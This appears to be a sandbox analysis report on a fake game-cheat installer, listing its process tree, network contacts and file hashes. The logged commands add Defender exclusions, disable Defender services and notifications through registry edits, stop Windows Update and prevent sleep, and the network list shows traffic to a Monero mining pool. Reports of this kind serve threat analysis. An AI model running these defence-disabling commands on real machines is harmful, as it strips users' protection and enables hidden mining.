PID 1864 wrote to memory of 4708 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4708 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2124 wrote to memory of 3348 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 3348 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 3348 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4708 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4708 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding EE8884940FF6512E553F6BFACBDBDC93 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532419 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 944441AC5B7ECC4E47752AE24CCA0060

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFF91.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFF7E.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFF7F.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFF80.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B3D2C63B65644E827E8E739EC4F08D8C E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSIF28E.tmp

"C:\Windows\Installer\MSIF28E.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF2C0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiF2AD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrF2AE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrF2AF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F3D1.tmp\F3D2.tmp\F3D3.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI3D45.tmp

"C:\Windows\Installer\MSI3D45.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI3D65.tmp

"C:\Windows\Installer\MSI3D65.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI3D76.tmp

"C:\Windows\Installer\MSI3D76.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

Network

Country Destination Domain Proto
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

